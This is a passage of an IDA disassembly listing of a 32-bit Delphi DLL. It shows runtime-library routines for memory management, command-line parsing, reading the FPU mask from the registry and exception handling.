jge short loc_100022E5
add edx, [esp+18h+var_18]
mov ebx, edx
mov eax, [esp+18h+var_18]
sub [esp+18h+var_14], eax
jmp short loc_10002311
; ---------------------------------------------------------------------------
loc_100022E5: ; CODE XREF: sub_10002190+145�j
call sub_10001914
mov eax, [esp+18h+var_14]
sub [esp+18h+var_18], eax
cmp [esp+18h+var_18], 0Ch
jl short loc_10002305
mov eax, ebp
add eax, esi
mov edx, [esp+18h+var_18]
call sub_10001B7C
jmp short loc_1000233F
; ---------------------------------------------------------------------------
loc_10002305: ; CODE XREF: sub_10002190+165�j
add esi, [esp+18h+var_18]
mov ebx, ebp
add ebx, esi
and dword ptr [ebx], 0FFFFFFFEh
jmp short loc_1000233F
; ---------------------------------------------------------------------------
loc_10002311: ; CODE XREF: sub_10002190+132�j
; sub_10002190+153�j
mov eax, [ebx]
test eax, 80000000h
jz short loc_1000233B
and eax, 7FFFFFFCh
add eax, ebx
mov ebx, eax
mov edx, [esp+18h+var_14]
mov eax, ebx
call sub_10001D08
test al, al
jz short loc_1000233B
mov ebx, ebp
add ebx, edi
jmp loc_10002248
; ---------------------------------------------------------------------------
loc_1000233B: ; CODE XREF: sub_10002190+188�j
; sub_10002190+1A0�j
xor eax, eax
jmp short loc_10002358
; ---------------------------------------------------------------------------
loc_1000233F: ; CODE XREF: sub_10002190+5D�j
; sub_10002190+77�j ...
mov eax, esi
sub eax, edi
add ds:dword_100055A0, eax
mov eax, [ebp+0]
and eax, 80000003h
or esi, eax
mov [ebp+0], esi
mov al, 1
loc_10002358: ; CODE XREF: sub_10002190+121�j
; sub_10002190+1AD�j
pop ecx
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_10002190 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10002360 proc near ; CODE XREF: sub_10002464+D�p
; DATA XREF: DATA:off_1000402C�o
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov esi, edx
mov ebx, eax
cmp ds:byte_100055A8, 0
jnz short loc_10002387
call sub_10001770
test al, al
jnz short loc_10002387
xor eax, eax
mov [ebp+var_4], eax
jmp loc_10002418
; ---------------------------------------------------------------------------
loc_10002387: ; CODE XREF: sub_10002360+12�j
; sub_10002360+1B�j
xor edx, edx
push ebp
push offset loc_10002411
push dword ptr fs:[edx]
mov fs:[edx], esp
cmp ds:byte_10005035, 0
jz short loc_100023A8
push offset dword_100055B0
call sub_100010CC ; RtlEnterCriticalSection
loc_100023A8: ; CODE XREF: sub_10002360+3C�j
mov edx, esi
mov eax, ebx
call sub_10002190
test al, al
jz short loc_100023BA
mov [ebp+var_4], ebx
jmp short loc_100023F0
; ---------------------------------------------------------------------------
loc_100023BA: ; CODE XREF: sub_10002360+53�j
mov eax, esi
call sub_10001E5C
mov edi, eax
mov eax, ebx
sub eax, 4
mov eax, [eax]
and eax, 7FFFFFFCh
sub eax, 4
cmp esi, eax
jge short loc_100023D8
mov eax, esi
loc_100023D8: ; CODE XREF: sub_10002360+74�j
test edi, edi
jz short loc_100023ED
mov edx, edi
mov ecx, ebx
xchg eax, ecx
call sub_10002528
mov eax, ebx
call sub_10001FEC
loc_100023ED: ; CODE XREF: sub_10002360+7A�j
mov [ebp+var_4], edi
loc_100023F0: ; CODE XREF: sub_10002360+58�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10002418
loc_100023FD: ; CODE XREF: sub_10002360+B6�j
cmp ds:byte_10005035, 0
jz short locret_10002410
push offset dword_100055B0
call sub_100010D4 ; RtlLeaveCriticalSection
locret_10002410: ; CODE XREF: sub_10002360+A4�j
retn
; ---------------------------------------------------------------------------
loc_10002411: ; DATA XREF: sub_10002360+2A�o
jmp loc_10002A5C
; ---------------------------------------------------------------------------
jmp short loc_100023FD
; ---------------------------------------------------------------------------
loc_10002418: ; CODE XREF: sub_10002360+22�j
; DATA XREF: sub_10002360+98�o
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn
sub_10002360 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10002424 proc near ; CODE XREF: sub_10003058+C�p
; sub_10003710+3F�p
push ebx
test eax, eax
jle short loc_1000243E
call ds:off_10004024
mov ebx, eax
test ebx, ebx
jnz short loc_10002440
mov al, 1
call sub_1000250C
; ---------------------------------------------------------------------------
jmp short loc_10002440
; ---------------------------------------------------------------------------
loc_1000243E: ; CODE XREF: sub_10002424+3�j
xor ebx, ebx
loc_10002440: ; CODE XREF: sub_10002424+F�j
; sub_10002424+18�j
mov eax, ebx
pop ebx
retn
sub_10002424 endp
; =============== S U B R O U T I N E =======================================
sub_10002444 proc near ; CODE XREF: sub_10002FC0+1C�p
; sub_10002FE4+21�p ...
push ebx
test eax, eax
jz short loc_1000245E
call ds:off_10004028
mov ebx, eax
test ebx, ebx
jz short loc_10002460
mov al, 2
call sub_1000250C
; ---------------------------------------------------------------------------
jmp short loc_10002460
; ---------------------------------------------------------------------------
loc_1000245E: ; CODE XREF: sub_10002444+3�j
xor ebx, ebx
loc_10002460: ; CODE XREF: sub_10002444+F�j
; sub_10002444+18�j
mov eax, ebx
pop ebx
retn
sub_10002444 endp
; =============== S U B R O U T I N E =======================================
sub_10002464 proc near ; CODE XREF: sub_10003124+22�p
mov ecx, [eax]
test ecx, ecx
jz short loc_1000249C
test edx, edx
jz short loc_10002486
push eax
mov eax, ecx
call ds:off_1000402C
pop ecx
or eax, eax
jz short loc_10002495
mov [ecx], eax
retn
; ---------------------------------------------------------------------------
loc_1000247F: ; CODE XREF: sub_10002464+2E�j
mov al, 2
jmp sub_1000250C
; ---------------------------------------------------------------------------
loc_10002486: ; CODE XREF: sub_10002464+8�j
mov [eax], edx
mov eax, ecx
call ds:off_10004028
or eax, eax
jnz short loc_1000247F
retn
; ---------------------------------------------------------------------------
loc_10002495: ; CODE XREF: sub_10002464+16�j
; sub_10002464+48�j
mov al, 1
jmp sub_1000250C
; ---------------------------------------------------------------------------
loc_1000249C: ; CODE XREF: sub_10002464+4�j
test edx, edx
jz short locret_100024B0
push eax
mov eax, edx
call ds:off_10004024
pop ecx
or eax, eax
jz short loc_10002495
mov [ecx], eax
locret_100024B0: ; CODE XREF: sub_10002464+3A�j
retn
sub_10002464 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_100024B4 proc near ; CODE XREF: sub_100024C0+42�p
; CODE:10002BC7�p
mov ds:dword_10004004, edx
call sub_10002FA8
sub_100024B4 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_100024C0 proc near ; CODE XREF: sub_1000250C+6�j
push ebx
push esi
mov esi, edx
mov ebx, eax
and bl, 7Fh
cmp ds:dword_10005008, 0
jz short loc_100024DC
mov edx, esi
mov eax, ebx
call ds:dword_10005008
loc_100024DC: ; CODE XREF: sub_100024C0+10�j
test bl, bl
jnz short loc_100024ED
call sub_10003404
mov ebx, [eax+4]
jmp short loc_100024FC
; ---------------------------------------------------------------------------
loc_100024ED: ; CODE XREF: sub_100024C0+1E�j
cmp bl, 18h
ja short loc_100024FC
xor eax, eax
mov al, bl
mov bl, ds:byte_10004030[eax]
loc_100024FC: ; CODE XREF: sub_100024C0+2B�j
; sub_100024C0+30�j
xor eax, eax
mov al, bl
mov edx, esi
call sub_100024B4
sub_100024C0 endp
; ---------------------------------------------------------------------------
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_1000250C proc near ; CODE XREF: sub_10002424+13�p
; sub_10002444+13�p ...
and eax, 7Fh
mov edx, [esp+0]
jmp sub_100024C0
sub_1000250C endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_10002518 proc near ; CODE XREF: sub_100026B4+38�p
; sub_100026B4+4C�p
push ebx
mov ebx, eax
call sub_10003404
mov [eax+4], ebx
pop ebx
retn
sub_10002518 endp
; =============== S U B R O U T I N E =======================================
sub_10002528 proc near ; CODE XREF: sub_10002360+81�p
; sub_10003014+1B�p ...
push esi
push edi
mov esi, eax
mov edi, edx
mov eax, ecx
cmp edi, esi
ja short loc_10002547
jz short loc_10002565
sar ecx, 2
js short loc_10002565
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_10002547: ; CODE XREF: sub_10002528+A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
sar ecx, 2
js short loc_10002565
std
rep movsd
mov ecx, eax
and ecx, 3
add esi, 3
add edi, 3
rep movsb
cld
loc_10002565: ; CODE XREF: sub_10002528+C�j
; sub_10002528+11�j ...
pop edi
pop esi
retn
sub_10002528 endp
; =============== S U B R O U T I N E =======================================
sub_10002568 proc near ; CODE XREF: sub_10002654+41�p
push ebx
push esi
push edi
push ebp
mov esi, edx
mov ebx, eax
jmp short loc_1000257A
; ---------------------------------------------------------------------------
loc_10002572: ; CODE XREF: sub_10002568+1A�j
push ebx
call sub_10001028 ; CharNextA
mov ebx, eax
loc_1000257A: ; CODE XREF: sub_10002568+8�j
; sub_10002568+2A�j
mov al, [ebx]
test al, al
jz short loc_10002584
cmp al, 20h
jbe short loc_10002572
loc_10002584: ; CODE XREF: sub_10002568+16�j
cmp byte ptr [ebx], 22h
jnz short loc_10002594
cmp byte ptr [ebx+1], 22h
jnz short loc_10002594
add ebx, 2
jmp short loc_1000257A
; ---------------------------------------------------------------------------
loc_10002594: ; CODE XREF: sub_10002568+1F�j
; sub_10002568+25�j
xor ebp, ebp
mov edi, ebx
jmp short loc_100025DD
; ---------------------------------------------------------------------------
loc_1000259A: ; CODE XREF: sub_10002568+79�j
cmp al, 22h
jnz short loc_100025CF
push ebx
call sub_10001028 ; CharNextA
mov ebx, eax
jmp short loc_100025B6
; ---------------------------------------------------------------------------
loc_100025A8: ; CODE XREF: sub_10002568+56�j
push ebx
call sub_10001028 ; CharNextA
mov edx, eax
sub edx, ebx
add ebp, edx
mov ebx, eax
loc_100025B6: ; CODE XREF: sub_10002568+3E�j
mov al, [ebx]
test al, al
jz short loc_100025C0
cmp al, 22h
jnz short loc_100025A8
loc_100025C0: ; CODE XREF: sub_10002568+52�j
cmp byte ptr [ebx], 0
jz short loc_100025DD
push ebx
call sub_10001028 ; CharNextA
mov ebx, eax
jmp short loc_100025DD
; ---------------------------------------------------------------------------
loc_100025CF: ; CODE XREF: sub_10002568+34�j
push ebx
call sub_10001028 ; CharNextA
mov edx, eax
sub edx, ebx
add ebp, edx
mov ebx, eax
loc_100025DD: ; CODE XREF: sub_10002568+30�j
; sub_10002568+5B�j ...
mov al, [ebx]
cmp al, 20h
ja short loc_1000259A
mov eax, esi
mov edx, ebp
call sub_10003124
mov ebx, edi
mov edi, [esi]
xor esi, esi
jmp short loc_10002645
; ---------------------------------------------------------------------------
loc_100025F4: ; CODE XREF: sub_10002568+E1�j
cmp al, 22h
jnz short loc_10002630
push ebx
call sub_10001028 ; CharNextA
mov ebx, eax
jmp short loc_10002617
; ---------------------------------------------------------------------------
loc_10002602: ; CODE XREF: sub_10002568+B7�j
push ebx
call sub_10001028 ; CharNextA
cmp eax, ebx
jbe short loc_10002617
loc_1000260C: ; CODE XREF: sub_10002568+AD�j
mov dl, [ebx]
mov [edi+esi], dl
inc ebx
inc esi
cmp eax, ebx
ja short loc_1000260C
loc_10002617: ; CODE XREF: sub_10002568+98�j
; sub_10002568+A2�j
mov al, [ebx]
test al, al
jz short loc_10002621
cmp al, 22h
jnz short loc_10002602
loc_10002621: ; CODE XREF: sub_10002568+B3�j
cmp byte ptr [ebx], 0
jz short loc_10002645
push ebx
call sub_10001028 ; CharNextA
mov ebx, eax
jmp short loc_10002645
; ---------------------------------------------------------------------------
loc_10002630: ; CODE XREF: sub_10002568+8E�j
push ebx
call sub_10001028 ; CharNextA
cmp eax, ebx
jbe short loc_10002645
loc_1000263A: ; CODE XREF: sub_10002568+DB�j
mov dl, [ebx]
mov [edi+esi], dl
inc ebx
inc esi
cmp eax, ebx
ja short loc_1000263A
loc_10002645: ; CODE XREF: sub_10002568+8A�j
; sub_10002568+BC�j ...
mov al, [ebx]
cmp al, 20h
ja short loc_100025F4
mov eax, ebx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_10002568 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10002654 proc near ; CODE XREF: sub_10003710+17A�p
var_114 = byte ptr -114h
push ebx
push esi
push edi
add esp, 0FFFFFEF8h
mov ebx, edx
mov esi, eax
mov eax, ebx
call sub_10002FC0
test esi, esi
jnz short loc_1000268A
push 105h
lea eax, [esp+118h+var_114]
push eax
push 0
call sub_10001050 ; GetModuleFileNameA
mov ecx, eax
mov edx, esp
mov eax, ebx
call sub_10003084
jmp short loc_100026A8
; ---------------------------------------------------------------------------
loc_1000268A: ; CODE XREF: sub_10002654+16�j
call sub_10001048 ; GetCommandLineA
mov edi, eax
loc_10002691: ; CODE XREF: sub_10002654+52�j
mov edx, ebx
mov eax, edi
call sub_10002568
mov edi, eax
test esi, esi
jz short loc_100026A8
cmp dword ptr [ebx], 0
jz short loc_100026A8
dec esi
jmp short loc_10002691
; ---------------------------------------------------------------------------
loc_100026A8: ; CODE XREF: sub_10002654+34�j
; sub_10002654+4A�j ...
add esp, 108h
pop edi
pop esi
pop ebx
retn
sub_10002654 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_100026B4 proc near ; CODE XREF: sub_100032C4+1E�p
; sub_100032C4+28�p ...
push ebx
push esi
mov ebx, eax
xor esi, esi
mov ax, [ebx+4]
cmp ax, 0D7B1h
jb short loc_100026F3
cmp ax, 0D7B3h
ja short loc_100026F3
and ax, 0D7B2h
cmp ax, 0D7B2h
jnz short loc_100026DB
mov eax, ebx
call dword ptr [ebx+1Ch]
mov esi, eax
loc_100026DB: ; CODE XREF: sub_100026B4+1E�j
test esi, esi
jnz short loc_100026E6
mov eax, ebx
call dword ptr [ebx+24h]
mov esi, eax
loc_100026E6: ; CODE XREF: sub_100026B4+29�j
test esi, esi
jz short loc_10002705
mov eax, esi
call sub_10002518
jmp short loc_10002705
; ---------------------------------------------------------------------------
loc_100026F3: ; CODE XREF: sub_100026B4+E�j
; sub_100026B4+14�j
cmp ebx, offset dword_10005038
jz short loc_10002705
mov eax, 67h
call sub_10002518
loc_10002705: ; CODE XREF: sub_100026B4+34�j
; sub_100026B4+3D�j ...
mov eax, esi
pop esi
pop ebx
retn
sub_100026B4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_1000270C proc near ; CODE XREF: sub_1000356C+2�p
push edi
mov edi, eax
mov ch, cl
mov eax, ecx
shl eax, 10h
mov ax, cx
mov ecx, edx
sar ecx, 2
js short loc_10002729
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_10002729: ; CODE XREF: sub_1000270C+12�j
pop edi
retn
sub_1000270C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1000272C proc near ; CODE XREF: sub_10002734+5�p
; sub_10002734+11�p
jmp ds:dword_100060C8
sub_1000272C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10002734 proc near ; CODE XREF: sub_10003318+21�p
push ebx
xor ebx, ebx
push 0
call sub_1000272C ; GetKeyboardType
cmp eax, 7
jnz short loc_1000275F
push 1
call sub_1000272C ; GetKeyboardType
and eax, 0FF00h
cmp eax, 0D00h
jz short loc_1000275D
cmp eax, 400h
jnz short loc_1000275F
loc_1000275D: ; CODE XREF: sub_10002734+20�j
mov bl, 1
loc_1000275F: ; CODE XREF: sub_10002734+D�j
; sub_10002734+27�j
mov eax, ebx
pop ebx
retn
sub_10002734 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10002764 proc near ; CODE XREF: sub_10003318+2A�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
movzx eax, ds:word_1000400C
mov [ebp+var_8], eax
lea eax, [ebp+var_4]
push eax
push 1
push 0
push offset aSoftwareBorlan ; "SOFTWARE\\Borland\\Delphi\\RTL"
push 80000002h
call sub_10001068 ; RegOpenKeyExA
test eax, eax
jnz short loc_100027DC
xor eax, eax
push ebp
push offset loc_100027D5
push dword ptr fs:[eax]
mov fs:[eax], esp
mov [ebp+var_C], 4
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
push 0
push 0
push offset aFpumaskvalue ; "FPUMaskValue"
mov eax, [ebp+var_4]
push eax
call sub_10001070 ; RegQueryValueExA
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_100027DC
loc_100027CB: ; CODE XREF: sub_10002764+76�j
mov eax, [ebp+var_4]
push eax
call sub_10001060 ; RegCloseKey
retn
; ---------------------------------------------------------------------------
loc_100027D5: ; DATA XREF: sub_10002764+2E�o
jmp loc_10002A5C
; ---------------------------------------------------------------------------
jmp short loc_100027CB
; ---------------------------------------------------------------------------
loc_100027DC: ; CODE XREF: sub_10002764+29�j
; DATA XREF: sub_10002764+62�o
mov ax, ds:word_1000400C
and ax, 0FFC0h
mov dx, word ptr [ebp+var_8]
and dx, 3Fh
or ax, dx
mov ds:word_1000400C, ax
mov esp, ebp
pop ebp
retn
sub_10002764 endp
; ---------------------------------------------------------------------------
align 4
aSoftwareBorlan db 'SOFTWARE\Borland\Delphi\RTL',0 ; DATA XREF: sub_10002764+18�o
aFpumaskvalue db 'FPUMaskValue',0 ; DATA XREF: sub_10002764+4C�o
align 4
; =============== S U B R O U T I N E =======================================
sub_10002828 proc near ; CODE XREF: sub_10002CB8-368�p
; CODE:10002BFE�p ...
fninit
wait
fldcw ds:word_1000400C
retn
sub_10002828 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10002834 proc near ; CODE XREF: CODE:10002A4F�j
; sub_10002A94+30�p ...
test eax, eax
jz short locret_1000283F
mov dl, 1
mov ecx, [eax]
call dword ptr [ecx-4]
locret_1000283F: ; CODE XREF: sub_10002834+2�j
retn
sub_10002834 endp
; =============== S U B R O U T I N E =======================================
sub_10002840 proc near ; CODE XREF: sub_10002A94+35�p
cmp ds:byte_10004010, 1
jbe short locret_1000285A
push 0
push 0
push 0
push 0EEDFADFh
call ds:off_10005010
locret_1000285A: ; CODE XREF: sub_10002840+7�j
retn
sub_10002840 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_1000285C proc near ; CODE XREF: sub_10002CB8-33B�p
cmp ds:byte_10004010, 0
jz short locret_1000287C
push eax
push eax
push edx
push esp
push 2
push 0
push 0EEDFAE4h
call ds:off_10005010
add esp, 8
pop eax
locret_1000287C: ; CODE XREF: sub_1000285C+7�j
retn
sub_1000285C endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_10002898
loc_10002880: ; CODE XREF: sub_10002898+B�j
push esp
push 1
push 0
push 0EEDFAE0h
call ds:off_10005010
add esp, 4
pop eax
retn
; END OF FUNCTION CHUNK FOR sub_10002898
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10002898 proc near ; CODE XREF: sub_10002CB8-28B�p
; FUNCTION CHUNK AT 10002880 SIZE 00000015 BYTES
cmp ds:byte_10004010, 1
jbe short locret_100028A8
push eax
push ebx
jmp loc_10002880
; ---------------------------------------------------------------------------
locret_100028A8: ; CODE XREF: sub_10002898+7�j
retn
sub_10002898 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_100028AC proc near ; CODE XREF: sub_100028CC+C�p
test ecx, ecx
jz short locret_100028C9
mov eax, [ecx+1]
cmp byte ptr [ecx], 0E9h
jz short loc_100028C4
cmp byte ptr [ecx], 0EBh
jnz short locret_100028C9
movsx eax, al
inc ecx
inc ecx
jmp short loc_100028C7
; ---------------------------------------------------------------------------
loc_100028C4: ; CODE XREF: sub_100028AC+A�j
add ecx, 5
loc_100028C7: ; CODE XREF: sub_100028AC+16�j
add ecx, eax
locret_100028C9: ; CODE XREF: sub_100028AC+2�j
; sub_100028AC+F�j
retn
sub_100028AC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_100028CC proc near ; CODE XREF: sub_10001770+1311�p
cmp ds:byte_10004010, 1
jbe short locret_100028F2
push eax
push edx
push ecx
call sub_100028AC
push ecx
push esp
push 1
push 0
push 0EEDFAE1h
call ds:off_10005010
pop ecx
pop ecx
pop edx
pop eax
locret_100028F2: ; CODE XREF: sub_100028CC+7�j
retn
sub_100028CC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_100028F4 proc near ; CODE XREF: sub_10002AE8+28�p
cmp ds:byte_10004010, 1
jbe short locret_1000290F
push edx
push esp
push 1
push 0
push 0EEDFAE2h
call ds:off_10005010
pop edx
locret_1000290F: ; CODE XREF: sub_100028F4+7�j
retn
sub_100028F4 endp
; =============== S U B R O U T I N E =======================================
sub_10002910 proc near ; CODE XREF: CODE:loc_10002C45�p
push eax
push edx
cmp ds:byte_10004010, 1
jbe short loc_1000292B
push esp
push 2
push 0
push 0EEDFAE3h
call ds:off_10005010
loc_1000292B: ; CODE XREF: sub_10002910+9�j
pop edx
pop eax
retn
sub_10002910 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_10002CB8
loc_10002930: ; CODE XREF: sub_10002CB8:loc_10002CFE�j
; sub_10002D18:loc_10002D5E�j ...
mov eax, [esp-4+arg_0]
test dword ptr [eax+4], 6
jnz loc_10002A54
cmp dword ptr [eax], 0EEDFADEh
mov edx, [eax+18h]
mov ecx, [eax+14h]
jz short loc_100029BD
cld
call sub_10002828
mov edx, ds:dword_1000500C
test edx, edx
jz loc_10002A54
call edx
test eax, eax
jz loc_10002A54
mov edx, [esp-4+arg_8]
mov ecx, [esp-4+arg_0]
cmp dword ptr [ecx], 0EEFFACEh
jz short loc_100029B4
call sub_1000285C
cmp ds:byte_10004014, 0
jbe short loc_100029B4
cmp ds:byte_10004010, 0
ja short loc_100029B4
lea ecx, [esp-4+arg_0]
push eax
push ecx
call sub_10001018 ; UnhandledExceptionFilter
cmp eax, 0
pop eax
jz loc_10002A54
mov edx, eax
mov eax, [esp+4]
mov ecx, [eax+0Ch]
jmp short loc_100029E4
; ---------------------------------------------------------------------------
loc_100029B4: ; CODE XREF: sub_10002CB8-33D�j
; sub_10002CB8-32F�j ...
mov edx, eax
mov eax, [esp-4+arg_0]
mov ecx, [eax+0Ch]
loc_100029BD: ; CODE XREF: sub_10002CB8-36B�j
cmp ds:byte_10004014, 1
jbe short loc_100029E4
cmp ds:byte_10004010, 0
ja short loc_100029E4
push eax
lea eax, [esp+arg_0]
push edx
push ecx
push eax
call sub_10001018 ; UnhandledExceptionFilter
cmp eax, 0
pop ecx
pop edx
pop eax
jz short loc_10002A54
loc_100029E4: ; CODE XREF: sub_10002CB8-306�j
; sub_10002CB8-2F4�j ...
or dword ptr [eax+4], 2
push ebx
xor ebx, ebx
push esi
push edi
push ebp
mov ebx, fs:[ebx]
push ebx
push eax
push edx
push ecx
mov edx, [esp+20h+arg_0]
push 0
push eax
push offset loc_10002A08
push edx
call ds:off_10005014
loc_10002A08: ; DATA XREF: sub_10002CB8-2BC�o
mov edi, [esp+30h+var_8]
call sub_10003404
push dword ptr [eax+0]
mov [eax+0], esp
mov ebp, [edi+8]
mov ebx, [edi+4]
mov dword ptr [edi+4], offset sub_10002A34
add ebx, 5
call sub_10002898
jmp ebx
; END OF FUNCTION CHUNK FOR sub_10002CB8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10002A34 proc near ; DATA XREF: sub_10002CB8-295�o
jmp loc_10002A5C
sub_10002A34 endp
; ---------------------------------------------------------------------------
call sub_10003404
mov ecx, [eax+0]
mov edx, [ecx]
mov [eax+0], edx
mov eax, [ecx+8]
jmp sub_10002834
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_10002CB8
loc_10002A54: ; CODE XREF: sub_10002CB8-37D�j
; sub_10002CB8-35B�j ...
mov eax, 1
retn
; END OF FUNCTION CHUNK FOR sub_10002CB8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_10001770
loc_10002A5C: ; CODE XREF: sub_10001770:loc_10001826�j
; sub_10001834:loc_1000190A�j ...
mov eax, [esp+4]
mov edx, [esp+arg_0]
test dword ptr [eax+4], 6
jz short loc_10002A8C
mov ecx, [edx+4]
mov dword ptr [edx+4], offset loc_10002A8C
push ebx
push esi
push edi
push ebp
mov ebp, [edx+8]
add ecx, 5
call sub_100028CC
call ecx
pop ebp
pop edi
pop esi
pop ebx
loc_10002A8C: ; CODE XREF: sub_10001770+12FB�j
; DATA XREF: sub_10001770+1300�o
mov eax, 1
retn
; END OF FUNCTION CHUNK FOR sub_10001770
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10002A94 proc near ; CODE XREF: sub_10002CB8+50�p
; sub_10002D18+50�p
arg_2C = dword ptr 30h
mov eax, [esp+arg_2C]
mov dword ptr [eax+4], offset loc_10002ADF
call sub_10003404
mov edx, [eax+0]
mov ecx, [edx]
mov [eax+0], ecx
mov eax, [edx+0Ch]
and dword ptr [eax+4], 0FFFFFFFDh
cmp dword ptr [eax], 0EEDFADEh
jz short loc_10002ACE
mov eax, [edx+8]
call sub_10002834
call sub_10002840
loc_10002ACE: ; CODE XREF: sub_10002A94+2B�j
xor eax, eax
add esp, 14h
mov edx, fs:[eax]
pop ecx
mov edx, [edx]
mov [ecx], edx
pop ebp
pop edi
pop esi
pop ebx
loc_10002ADF: ; DATA XREF: sub_10002A94+4�o
mov eax, 1
retn
sub_10002A94 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10002AE8 proc near ; CODE XREF: sub_10002CB8+55�p
; sub_10002D18+55�p ...
arg_2C = dword ptr 30h
call sub_10003404
mov edx, [eax+0]
mov ecx, [edx]
mov [eax+0], ecx
mov eax, [edx+8]
call sub_10002834
pop edx
mov esp, [esp-4+arg_2C]
xor eax, eax
pop ecx
mov fs:[eax], ecx
pop eax
pop ebp
call sub_100028F4
jmp edx
sub_10002AE8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_10002B18 proc near ; CODE XREF: sub_10001E5C+F5�p
; sub_10001E5C+14A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
xor edx, edx
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
add ecx, 5
mov fs:[edx], eax
call ecx
retn 0Ch
sub_10002B18 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
loc_10002B30: ; CODE XREF: CODE:10002C30�j
; CODE:10002C3C�j
push ebp
mov ebp, esp
mov edx, [ebp+8]
mov eax, [edx]
cmp eax, 0C0000092h
jg short loc_10002B6B
jz short loc_10002B9D
cmp eax, 0C000008Eh
jg short loc_10002B5D
jz short loc_10002BA1
sub eax, 0C0000005h
jz short loc_10002BAD
sub eax, 87h
jz short loc_10002B95
dec eax
jz short loc_10002BA9
jmp short loc_10002BBD
; ---------------------------------------------------------------------------
loc_10002B5D: ; CODE XREF: CODE:10002B46�j
add eax, 3FFFFF71h
sub eax, 2
jb short loc_10002B9D
jz short loc_10002B99
jmp short loc_10002BBD
; ---------------------------------------------------------------------------
loc_10002B6B: ; CODE XREF: CODE:10002B3D�j
cmp eax, 0C0000096h
jg short loc_10002B83
jz short loc_10002BB1
sub eax, 0C0000093h
jz short loc_10002BA9
dec eax
jz short loc_10002B91
dec eax
jz short loc_10002BA5
jmp short loc_10002BBD
; ---------------------------------------------------------------------------
loc_10002B83: ; CODE XREF: CODE:10002B70�j
sub eax, 0C00000FDh
jz short loc_10002BB9
sub eax, 3Dh
jz short loc_10002BB5
jmp short loc_10002BBD
; ---------------------------------------------------------------------------
loc_10002B91: ; CODE XREF: CODE:10002B7C�j
mov al, 0C8h
jmp short loc_10002BBF
; ---------------------------------------------------------------------------
loc_10002B95: ; CODE XREF: CODE:10002B56�j
mov al, 0C9h
jmp short loc_10002BBF
; ---------------------------------------------------------------------------
loc_10002B99: ; CODE XREF: CODE:10002B67�j
mov al, 0CDh
jmp short loc_10002BBF
; ---------------------------------------------------------------------------
loc_10002B9D: ; CODE XREF: CODE:10002B3F�j
; CODE:10002B65�j
mov al, 0CFh
jmp short loc_10002BBF
; ---------------------------------------------------------------------------
loc_10002BA1: ; CODE XREF: CODE:10002B48�j
mov al, 0C8h
jmp short loc_10002BBF
; ---------------------------------------------------------------------------
loc_10002BA5: ; CODE XREF: CODE:10002B7F�j
mov al, 0D7h
jmp short loc_10002BBF
; ---------------------------------------------------------------------------
loc_10002BA9: ; CODE XREF: CODE:10002B59�j
; CODE:10002B79�j
mov al, 0CEh
jmp short loc_10002BBF
; ---------------------------------------------------------------------------
loc_10002BAD: ; CODE XREF: CODE:10002B4F�j
mov al, 0D8h
jmp short loc_10002BBF
; ---------------------------------------------------------------------------
loc_10002BB1: ; CODE XREF: CODE:10002B72�j
mov al, 0DAh
jmp short loc_10002BBF
; ---------------------------------------------------------------------------
loc_10002BB5: ; CODE XREF: CODE:10002B8D�j
